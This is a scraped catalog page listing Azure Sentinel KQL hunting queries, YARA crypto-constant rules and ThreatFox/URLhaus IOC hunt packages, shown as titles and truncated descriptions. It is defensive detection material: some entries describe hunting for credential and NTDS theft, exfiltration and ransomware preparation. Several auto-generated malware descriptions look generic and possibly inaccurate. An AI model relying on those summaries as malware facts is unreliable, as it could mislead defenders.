Detection rules, YARA signatures, and KQL queries for threat hunting in Azure Sentinel.
Type
Severity
Tactic
Tags
Azure-Sentinel source

Microsoft has observed attackers exploiting vulnerabilities associated with Log4J.

exploithuntingmicrosoftofficial
app-armor-stopped
kql medium
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, Sysrv botnet evolution. Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptoc

huntingmicrosoftofficial
Aria SBox 2
yara low
Yara-Rules source

Aria SBox 2

community
Yara-Rules source

Look for Base64 table

community
BigDig bpInit
yara low
Yara-Rules source

BigDig bpInit

community
BigDig mpModExp
yara low
Yara-Rules source

BigDig mpModExp

community
BigDig mpModInv
yara low
Yara-Rules source

BigDig mpModInv

community
BigDig mpModMult
yara low
Yara-Rules source

BigDig mpModMult

community
BigDig mpModulo
yara low
Yara-Rules source

BigDig mpModulo

community
BigDig spModExpB
yara low
Yara-Rules source

BigDig spModExpB

community
BigDig spModInv
yara low
Yara-Rules source

BigDig spModInv

community
BigDig spModMult
yara low
Yara-Rules source

BigDig spModMult

community
Yara-Rules source

Look for 128-bit key Chacha stream cipher constant

community
Yara-Rules source

Look for 256-bit key Chacha stream cipher constant

community
Yara-Rules source

CryptoPP ApplyFunction

community
Yara-Rules source

CryptoPP Integer constructor

community
Yara-Rules source

CryptoPP RsaFunction

community
Yara-Rules source

Look for DCP Blowfish EncryptCBC

community
Yara-Rules source

Look for DCP Blowfish Init

community
Yara-Rules source

Look for DCP Des EncryptECB

community
Yara-Rules source

Look for DCP Des Init

community
Yara-Rules source

Look for DCP RijnDael EncryptECB

community
Yara-Rules source

Look for DCP RijnDael Init

community
Azure-Sentinel source
DeviceEvents

Jupyter, otherwise known as SolarMarker, is a malware family and cluster of components known for its info-stealing and backdoor capabilities that mainly proliferates through search engine optimization

backdoorhuntingmicrosoftofficial
Yara-Rules source

Look for Compare string function

community
Yara-Rules source

Look for Copy function

community
Yara-Rules source

Look for DecodeDate (DecodeDateFully) function

community
Yara-Rules source

Look for Form.Show function

community
Yara-Rules source

Look for IntToStr function

community
Yara-Rules source

Look for Random function

community
Yara-Rules source

Look for RandomRange function

community
Yara-Rules source

Look for StrToInt function

community
Azure-Sentinel source
AlertEvidence

Microsoft has observed threat actors exploiting vulnerabilities associated with Log4J.

exploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Prior to deploying Macaw ransomware in an organization, the adversary will disable all controlled folders, which will enable them to be encrypted once the ransomware payload is deployed.

huntingmicrosoftofficialransomware
Azure-Sentinel source
DeviceProcessEvents

Dopplepaymer In-Memory Malware Implant. This query identifies processes with command line launch strings. Which match the pattern used in Dopplepaymer ransomware attacks.

huntingmicrosoftofficialransomware
Dragon Fly
kql medium
Azure-Sentinel source
DeviceProcessEvents

Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_dragonfly.yml. Questions via Twitter: @janvonkirchheim.

apthuntingmicrosoftofficial
Elise backdoor
kql medium
Azure-Sentinel source
DeviceProcessEvents

Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_elise.yml. Questions via Twitter: @janvonkirchheim.

aptbackdoorhuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_equationgroup_c2.yml. Questions via Twitter: @janvonkirchheim.

apthuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Jupyter, otherwise known as SolarMarker, is a malware family and cluster of components known for its info-stealing and backdoor capabilities that mainly proliferates through search engine optimization

backdoorhuntingmicrosoftofficialpowershell
Azure-Sentinel source
DeviceProcessEvents

This query searches for a string pattern detected in evasive PowerShell usage. Jupyter or SolarMarker will iterate on this pattern multiple times to read data and call additional processes. This query

backdoorhuntingmicrosoftofficialpowershell
Azure-Sentinel source
DeviceProcessEvents

Use this query to find Excel launching anomalous processes congruent with Qakbot payloads which contain additional markers from recent Qakbot executions. The presence of such anomalous processes indic

huntingmicrosoftofficial
FGint RsaSign
yara low
Yara-Rules source

FGint RsaSign

community
Azure-Sentinel source
DeviceFileEvents

Use this query to find attempts to access files in the local path containing Outlook emails.

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_hurricane_panda.yml. Questions via Twitter: @janvonkirchheim.

apthuntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEvents

The following query can locate activity possibly associated with the EUROPIUM threat actor

huntingmicrosoftofficial
Azure-Sentinel source
AlertEvidence

This query looks for Microsoft Defender Antivirus detections related to EUROPIUM actor

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

This query looks for identity add through exchange PowerShell

huntingmicrosoftofficialpowershell
Imminent Ransomware
kql medium
Azure-Sentinel source
DeviceProcessEvents

Directly prior to deploying Macaw ransomware in an organization, the attacker will run several commands designed to disable security tools and system recovery tools.

huntingmicrosoftofficialransomware
Azure-Sentinel source
DeviceProcessEvents

Prior to deploying Macaw ransomware in an organization, the adversary will disable several tools and functions in order to inhibit later recovery efforts.

huntingmicrosoftofficialransomware
Azure-Sentinel source
DeviceProcessEvents

Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_judgement_panda_gtr19.yml. Questions via Twitter: @janvonkirchheim.

apthuntingmicrosoftofficial
Azure-Sentinel source
AlertEvidence

'This query looks for Microsoft Defender Antivirus detections with the family names used by KNOTWEED'

huntingmicrosoftofficial
Azure-Sentinel source
DeviceRegistryEvents

'This query identifies modifications to COM registry keys to point to executable files in C:\Windows\System32\spool\drivers\color\'

huntingmicrosoftofficial
Azure-Sentinel source
DeviceNetworkEvents

'This query identifies matches based on domain IOCs related to KNOTWEED against Microsoft Defender for Endpoint device network connections'

huntingmicrosoftofficial
Azure-Sentinel source
DeviceNetworkEvents

'This query looks for new files being downloaded using Curl.'

huntingmicrosoftofficial
Azure-Sentinel source

'This query identifies matches based on KNOTWEED file hash IOCs across Microsoft Defender for Endpoint tables'

huntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEvents

'This query identifies modifications to COM registry keys to point to executable files in C:\Windows\System32\spool\drivers\color\'

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi

backdoorcredential-thefthuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi

backdoorcredential-thefthuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi

backdoorcredential-thefthuntingmicrosoftofficial
Azure-Sentinel source
DeviceNetworkEvents

LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi

backdoorcredential-thefthuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi

backdoorcredential-thefthuntingmicrosoftofficial
Azure-Sentinel source
EmailEvents

LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi

backdoorcredential-thefthuntingmicrosoftofficial
Azure-Sentinel source
DeviceNetworkEvents

LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi

backdoorcredential-thefthuntingmicrosoftofficial
Azure-Sentinel source
DeviceEvents

LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi

backdoorcredential-thefthuntingmicrosoftofficial
Yara-Rules source

LockBox DecryptRsaEx

community
Yara-Rules source

LockBox EncryptRsaEx

community
Yara-Rules source

LockBox RsaEncryptFile

community
Yara-Rules source

LockBox TlbRsaKey

community
Azure-Sentinel source
DeviceProcessEvents

Backdoor processes associated with OceanLotus Mac Malware Backdoor. References:. Https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/. OS platform

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Backdoor processes associated with OceanLotus Mac malware backdoor dropper. References:. Https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/. OS

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Prior to deploying Macaw ransomware in an organization, adversaries will change the password for hundreds or thousands of accounts in order to lock users out of the network and impeded recovery effort

huntingmicrosoftofficialransomware
Yara-Rules source

Miracl Big constructor

community
Yara-Rules source

Miracl mirsys init

community
Miracl mirvar
yara low
Yara-Rules source

Miracl mirvar

community
Azure-Sentinel source
DeviceRegistryEvents

Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_oceanlotus_registry.yml. Questions via Twitter: @janvonkirchheim.

apthuntingmicrosoftofficial
Yara-Rules source

OpenSSL BN_mod_exp_inverse

community
Yara-Rules source

OpenSSL BN_mod_exp_mont

community
Yara-Rules source

OpenSSL BN_mod_exp_recp

community
Yara-Rules source

OpenSSL BN_mod_exp_simple

community
Yara-Rules source

OpenSSL BN_mod_exp2_mont

community
OpenSSL DSA
yara low
Yara-Rules source

YARA rule: OpenSSL_DSA

community
Yara-Rules source

YARA rule: pkcs8_private_key_information_syntax_standard

community
Azure-Sentinel source
DeviceProcessEvents

Prior to deploying Macaw ransomware in an organization, adversaries wil use Attrib to display file attribute information on multiple drives and all subfolders.

huntinglateral-movementmicrosoftofficialransomware
Azure-Sentinel source
DeviceNetworkEvents

Qakbot operators have been abusing the Craigslist messaging system to send malicious emails. These emails contain non-clickable links to malicious domains impersonating Craigslist, which the user is i

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEvents

Use this query to find email stealing activities ran by Qakbot that will use "ping.exe -t 127.0.0.1" to obfuscate subsequent actions. Email theft that occurs might be exfiltrated to operators and indi

backdoorhuntingmicrosoftofficial
Qakbot email theft
kql medium
Azure-Sentinel source
DeviceFileEvents

Use this query to find email stealing activities ran by Qakbot that will use "ping.exe -t 127.0.0.1" to obfuscate subsequent actions. Email theft that occurs might be exfiltrated to operators and indi

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Use this query to find reconnaissance and beaconing activities after code injection occurs. Reconnaissance commands are consistent with the current version of Qakbot and occur automatically to exfiltr

backdoorcobalt-strikehuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Find use of Alternate Data Streams (ADS) for anti-forensic purposes. Alternate Data Streams execution.

huntingmicrosoftofficialransomware
Azure-Sentinel source
AlertEvidence

Adversaries are likely attempting to delete backup files in healthcare environments to eliminate recovery options

huntingmicrosoftofficialransomware
Azure-Sentinel source
DeviceProcessEvents

// Look for cipher.exe deleting data from multiple drives. This is often performed as an anti-forensic measure prior to encryption.

huntingmicrosoftofficialransomware
Azure-Sentinel source
DeviceProcessEvents

// Look for attempts to use fsutil.exe to delete file system logs that can be used as forensic artifacts.

huntingmicrosoftofficialransomware
Azure-Sentinel source
AlertEvidenceDeviceLogonEvents

Identify accounts that have logged on to affected endpoints. Check for specific alerts.

huntingmicrosoftofficialransomware
Azure-Sentinel source
DeviceProcessEvents

Find distinct evasion and execution activities. Associated with the Robbinhood ransomware campaign.

evasionhuntingmicrosoftofficialransomware
Azure-Sentinel source
DeviceProcessEvents

Find attempts to stop System Restore and. Prevent the system from creating restore points.

huntingmicrosoftofficialransomware
Azure-Sentinel source
DeviceFileEvents

Locate vulnerable Gigabyte drivers used by RobbinHood ransomware to turn off security tools.

huntingmicrosoftofficialransomware
RijnDael AES
yara low
Yara-Rules source

RijnDael AES

community
Yara-Rules source

RijnDael AES (check2) [char]

community
Yara-Rules source

RijnDael AES S-inv [char]

community
Yara-Rules source

RsaEuro NN_modInv

community
Yara-Rules source

RsaEuro NN_modMult

community
Yara-Rules source

RsaRef2 NN_modExp

community
Yara-Rules source

RsaRef2 NN_modInv

community
Yara-Rules source

RsaRef2 NN_modMult

community
Yara-Rules source

RsaRef2 RsaPrivateDecrypt

community
Yara-Rules source

RsaRef2 RsaPrivateEncrypt

community
Yara-Rules source

RsaRef2 RsaPublicDecrypt

community
Yara-Rules source

RsaRef2 RsaPublicEncrypt

community
Azure-Sentinel source
T1566
DeviceNetworkEvents

'This query identifies matches based on domain IOCs related to Star Blizzard against Microsoft Defender for Endpoint device network connections'

huntingmicrosoftofficial
StrRAT-AV-Discovery
kql medium
Azure-Sentinel source
DeviceProcessEvents

StrRAT is a Java-based remote access tool which steals browser credentials, logs keystrokes and take remote control of infected systems. It also has a module to download additional payload onto to the

backdoorcredential-thefthuntingmicrosoftofficialransomware
Azure-Sentinel source
EmailUrlInfo

StrRAT is a Java-based remote access tool which steals browser credentials, logs keystrokes and take remote control of infected systems. It also has a module to download additional payload onto to the

backdoorcredential-thefthuntingmicrosoftofficialransomware
Azure-Sentinel source
DeviceProcessEvents

StrRAT is a Java-based remote access tool which steals browser credentials, logs keystrokes and take remote control of infected systems. It also has a module to download additional payload onto to the

backdoorcredential-thefthuntingmicrosoftofficialpersistenceransomware
Azure-Sentinel source
DeviceNetworkEvents

Jupyter, otherwise known as SolarMarker, is a malware family and cluster of components known for its info-stealing and backdoor capabilities that mainly proliferates through search engine optimization

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Microsoft has observed attackers who have gained entry to an environment via the Log4J vulnerability utilizing identifiable strings in PowerShell commands.

exploithuntingmicrosoftofficialpowershell
Azure-Sentinel source
DeviceProcessEvents

Attackers may use unconventional PowerShell curl flags

exploithuntingmicrosoftofficialpowershell
Azure-Sentinel source
DeviceProcessEvents

Microsoft has observed attackers who have gained entry to an environment via the Log4J vulnerability utilizing the ws_TomcatService.exe process to launch malicious processes.

exploithuntingmicrosoftofficial
ThreatFox source
DnsEvents

Hunt package for 95 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
DeviceFileEventsUrlClickEvents

Hunt package for 3 IOCs associated with KongTuke

iocjs-kongtukethreatfox
ThreatFox source
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 8 IOCs associated with SmartApeSG

iocjs-smartapesgthreatfox
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 100 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
CommonSecurityLogDeviceNetworkEventsUrlClickEvents

Hunt package for 5 IOCs associated with Unknown RAT

backdooriocthreatfoxunknown_rat
ThreatFox: Amadey IOCs
ioc-hunt high
ThreatFox source
UrlClickEvents

Hunt package for 3 IOCs associated with Amadey

iocthreatfoxwin-amadey
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 6 IOCs associated with Cobalt Strike

cobalt-strikeiocthreatfoxwin-cobalt_strike
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 2 IOCs associated with Lumma Stealer

infostealeriocthreatfoxwin-lumma
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 5 IOCs associated with Nanocore RAT

backdooriocthreatfoxwin-nanocore
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 9 IOCs associated with Remcos

iocthreatfoxwin-remcos
ThreatFox: Stealc IOCs
ioc-hunt high
ThreatFox source
UrlClickEvents

The Stealc malware is a data exfiltration tool designed to steal sensitive information such as credentials and system data from infected hosts. It typically arrives via phishing emails or malicious websites containing malicious URLs that download and execute the payload. SOC analysts should monitor for unusual outbound traffic patterns, unexpected data transfers, and signs of lateral movement or command-and-control communication beyond the identified URLs.

iocthreatfoxwin-stealc
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with ValleyRAT

backdooriocthreatfoxwin-valley_rat
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 4 IOCs associated with Vidar

iocthreatfoxwin-vidar
Yara-Rules source

Look for Random function

community
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 17 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 8 malicious URLs tagged as arm

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 51 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 18 malicious URLs tagged as elf

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 4 malicious URLs tagged as mirai

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as Mozi

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 12 malicious URLs tagged as ua-wget

iocurlhaus
Azure-Sentinel source
DeviceProcessEvents

Prior to deploying Macaw ransomware in an organization, the adversary frequently uses MSBuild.exe as a LOLBin to communicate with the C2.

huntingmicrosoftofficialransomware
Yara-Rules source

Look for Random function

community
Yara-Rules source

Look for Random function

community
Yara-Rules source

YARA rule: x509_public_key_infrastructure_cert

community
Azure-Sentinel source
DeviceFileEventsDeviceImageLoadEventsDeviceProcessEvents

This query will hunt for files matching the current abuse.ch recent threat feed based on Sha256. Currently the query is set up to analyze the last day worth of events, but this is configurable using t

huntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEventsDeviceImageLoadEventsDeviceProcessEvents

This query will hunt for files matching the current abuse.ch recent threat feed based on Sha256. Currently the query is set up to analyze the last day worth of events, but this is configurable using t

huntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEvents

Sample query that search for .settingcontent-ms that has been downloaded from the web. Through Microsoft Edge, Internet Explorer, Google Chrome, Mozilla Firefox, Microsoft Outlook. For questions @Mila

huntingmicrosoftofficial
APT Baby Shark
kql medium
Azure-Sentinel source
DeviceProcessEvents

Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_babyshark.yml. Questions via Twitter: @janvonkirchheim.

apthuntingmicrosoftofficial
APT29 thinktanks
kql medium
Azure-Sentinel source
DeviceProcessEvents

Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_apt29_thinktanks.yml. Questions via Twitter: @janvonkirchheim.

apthuntingmicrosoftofficial
Bazacall Emails
kql medium
Azure-Sentinel source
EmailEvents

Bazacall malware uses emails that contain a phone number for the user to call in order to cancel a fake subscription. These emails contain no links or attachments, and use automatic payment lures to t

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_bear_activity_gtr19.yml. Questions via Twitter: @janvonkirchheim.

apthuntingmicrosoftofficial
Cloud Hopper
kql medium
Azure-Sentinel source
DeviceProcessEvents

Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_cloudhopper.yml. Questions via Twitter: @janvonkirchheim.

apthuntingmicrosoftofficial
Azure-Sentinel source
AlertEvidence

Microsoft has observed Bazacall using Cobalt Strike in order to move laterally to other machines on the network.

cobalt-strikehuntinglateral-movementmicrosoftofficial
DES [long]
yara low
Yara-Rules source

DES [long]

community
Yara-Rules source

DES [pbox] [long]

community
DES [sbox]
yara low
Yara-Rules source

DES [sbox]

community
Azure-Sentinel source
DeviceNetworkEvents

This is a query to retrieve last 30 days network connections to known Dofoil NameCoin servers. The full article is available here: https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-d

huntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEvents

BazaCall is a campaign that manipulate users into calling a customer support center, where they are instructed to download an Excel file to unsubscribe from a phony service. When the user opens the Ex

huntingmicrosoftofficial
Azure-Sentinel source
DeviceNetworkEvents

BazaCall is a campaign that manipulate users into calling a customer support center, where they are instructed to download an Excel file to unsubscribe from a phony service. When the user opens the Ex

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Bazacall uses malicious macro-enabled Excel documents to execute their payload.

huntingmicrosoftofficial
Yara-Rules source

FGint Base256StringToGInt

community
Yara-Rules source

FGint ConvertBase256StringToHexString

community
Yara-Rules source

FGint ConvertBase256to64

community
Yara-Rules source

FGint ConvertHexStringToBase256String

community
Yara-Rules source

FGint DSAPrimeSearch

community
FGint DSASign
yara low
Yara-Rules source

FGint DSASign

community
FGint DSAVerify
yara low
Yara-Rules source

FGint DSAVerify

community
Yara-Rules source

FGint ECAddPoints

community
Yara-Rules source

FGint ECElGamalEncrypt

community
Yara-Rules source

FGint ECPointDestroy

community
Yara-Rules source

FGint ECPointKMultiple

community
Yara-Rules source

FGint FGIntToBase256String

community
Yara-Rules source

FGint FindPrimeGoodCurveAndPoint

community
Yara-Rules source

FGint PGPConvertBase256to64

community
FGint RsaDecrypt
yara low
Yara-Rules source

FGint RsaDecrypt

community
FGint RSAEncrypt
yara low
Yara-Rules source

FGint RSAEncrypt

community
FGint RSAVerify
yara low
Yara-Rules source

FGint RSAVerify

community
Azure-Sentinel source
DeviceFileEvents

Bazacall uses malicious Excel files to execute payloads on affected devices.

huntingmicrosoftofficial
NTDS theft
kql medium
Azure-Sentinel source
DeviceProcessEvents

Microsoft has observed compromises related to Bazacall resulting in theft of the Active Directory database using ntdsutil.exe.

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Microsoft has observed Bazacall using a renamed version of Rclone for data exfiltration.

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
DeviceNetworkEvents

During the chain of events from Bazacall to Bazaloader, RunDLL makes several network connections, including to command and control (C2) infrastructure. The command line for these connections contains

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

The "Stolen Images" Bazarloader campaign uses fake copyright infingement contact form emails and malicious files pretending to contain "stolen images" to trick users into downloading the malware.

huntingmicrosoftofficial
ThreatFox source
DnsEvents

Hunt package for 103 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 7 IOCs associated with KongTuke

iocjs-kongtukethreatfox
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 6 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
UrlClickEvents

Hunt package for 2 IOCs associated with Lumma Stealer

infostealeriocthreatfoxwin-lumma
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 6 IOCs associated with Nanocore RAT

backdooriocthreatfoxwin-nanocore
ThreatFox source
DnsEvents

Quasar RAT is

backdooriocthreatfoxwin-quasar_rat
ThreatFox source
DnsEvents

StrelaStealer is a credential-stealing malware that exfiltrates sensitive data, including passwords and browser cookies, by establishing covert communication with command-and-control servers. It typically arrives via phishing emails containing malicious links or compromised websites that deploy the malware through exploit kits or malicious attachments. SOC analysts should monitor for lateral movement indicators, unusual outbound traffic patterns

infostealeriocthreatfoxwin-strelastealer
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 16 IOCs associated with Vidar

iocthreatfoxwin-vidar
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 47 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

ClearFake is a malware family that primarily functions as a data exfiltration tool, leveraging command-and-control (C2) communication to

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

The Mozi malware family is a downloader that establishes command-and-control (C2) communication to exfiltrate data and deploy additional payloads. It typically arrives via phishing emails or malicious websites leveraging

iocurlhaus
Azure-Sentinel source
DeviceImageLoadEvents

In the campaign where Bazarloader is delivered via emails containing pw protected zip attachments, regsvr32.exe is used to launch a malicious payload that is disguised as a JPG file.

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

The pw protected zip attachment -> Word doc delivery method of Bazarloader utilizes Word to create an .hta file and launch it via MSHTA to connect to a malicious domain and pull down the Bazarloader p

huntingmicrosoftofficial
Azure-Sentinel source
DeviceEvents

This query offers daily categorization of ASR rules, helping SOC analysts monitor specific categories like office-related activities or WMI among the 16 rules. It aids in tracking detection rates and

backdoorhuntingmicrosoftofficialwmi
Azure-Sentinel source
T1567

'Under specific circumstances, executing KQL queries can exfiltrate information like access tokens, regarding external data functions like adx(). This query tries to list executed KQL queries that use

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1530T1213T1020

'This hunting query looks for increases in the number of workspaces queried by a user.'

huntingmicrosoftofficial
Yara-Rules source

CryptoPP a_exp_b_mod_c

community
CryptoPP modulo
yara low
Yara-Rules source

CryptoPP modulo

community
Yara-Rules source

FGint Base10StringToGInt

community
Yara-Rules source

FGint FGIntDivMod

community
Yara-Rules source

FGint FGIntDestroy

community
Yara-Rules source

FGint FGIntModExp

community
Yara-Rules source

FGint MontgomeryModExp

community
FGint MulByInt
yara low
Yara-Rules source

FGint MulByInt

community
Azure-Sentinel source
T1485

'This hunting query identifies GitHub activites its the first time a user deleted a repo that may be a sign of compromise.'

huntingmicrosoftofficial
Azure-Sentinel source
T1136

'This hunting query identifies Accounts that are new or inactive and have accessed or used GitHub that may be a sign of compromise.'

huntingmicrosoftofficial
Azure-Sentinel source
T1485

'This hunting query identifies GitHub activites where there are a large number of deletions that may be a sign of compromise.'

huntingmicrosoftofficial
Azure-Sentinel source
T1505T1562

'This hunting query identifies GitHub OAuth Apps that have restrictions disabled that may be a sign of compromise. Attacker will want to disable such security tools in order to go undetected. '

huntingmicrosoftofficial
Azure-Sentinel source
T1213

'Attacker can exfiltrate data from your GitHub repository by cloning it. This hunting query tracks clone activities for each repository, allowing quick identification of anomalies/excessive clones to

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1213

Adversaries may exploit GitHub's public access to exfiltrate sensitive data or distribute malicious code by converting private repositories to public, leveraging the platform's visibility for covert operations. SOC teams should proactively

huntingmicrosoftofficial
Azure-Sentinel source
T1098T1562

'This hunting query identifies GitHub activites where permissions are updated that may be a sign of compromise.'

huntingmicrosoftofficial
Azure-Sentinel source
T1098T1078

'This hunting query identifies Accounts in GitHub that have granted access to another account which then grants access to yet another account that may be a sign of compromise.'

huntingmicrosoftofficial
Yara-Rules source

Looks for MD5 API

community
Yara-Rules source

Look for MD5 constants

community
Miracl crt
yara low
Yara-Rules source

Miracl crt

community
Miracl powmod
yara low
Yara-Rules source

Miracl powmod

community
Azure-Sentinel source
T1030

'This hunting query looks for users who are running multiple queries that return either a very large amount of data or the maximum amount allowed by the query method.'

huntingmicrosoftofficial
Azure-Sentinel source
T1530T1213T1020

'This hunting query looks for clients running queries that have not previously been seen running queries.'

huntingmicrosoftofficial
Azure-Sentinel source
T1530T1213T1020

'This hunting query looks for new Service Principals running queries that have not previously been seen running queries.'

huntingmicrosoftofficial
Azure-Sentinel source
T1530T1213

'This hunting query looks for users who have run queries calling a watchlist template relating to sensitive data that have not previously been seen calling these watchlists.'

huntingmicrosoftofficial
Azure-Sentinel source
T1530T1213

'This hunting query looks for users who have run queries that have not previously been seen running queries.'

huntingmicrosoftofficial
Azure-Sentinel source
T1030

'This hunting query looks for anomalously large LA queries by users.'

huntingmicrosoftofficial
Azure-Sentinel source
T1530T1213
AuditLogsSecurityEventSigninLogs

'This hunting query looks for queries that appear to be looking for secrets or passwords in tables.'

huntingmicrosoftofficial
Yara-Rules source

The RC6_Constants rule detects binaries containing RC6 encryption constants, which may indicate malicious activity leveraging the RC6 cipher.

community
Yara-Rules source

Look for RIPEMD-160 constants

community
Yara-Rules source

Look for SHA1 constants

community
Yara-Rules source

Look for SHA2/BLAKE2/Argon2 IVs

community
Yara-Rules source

Look for SHA384/SHA512 constants

community
Yara-Rules source

Look for TEA Encryption

community
ThreatFox: Kimwolf IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with Kimwolf

apk-kimwolfiocthreatfox
ThreatFox: Mirai IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

The Mirai malware family compromises IoT devices by exploiting default credentials and weak security configurations, turning them into bots for large-scale DDoS attacks. It typically arrives via network exploitation, leveraging un

elf-miraiiocthreatfox
ThreatFox source
DnsEvents

Hunt package for 77 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox source
DnsEvents

Hunt package for 2 IOCs associated with FAKEUPDATES

iocjs-fakeupdatesthreatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
DeviceFileEventsDnsEvents

The KongTuke malware is a data exfiltration tool that establishes

iocjs-kongtukethreatfox
ThreatFox source
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 36 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox: Havoc IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEvents

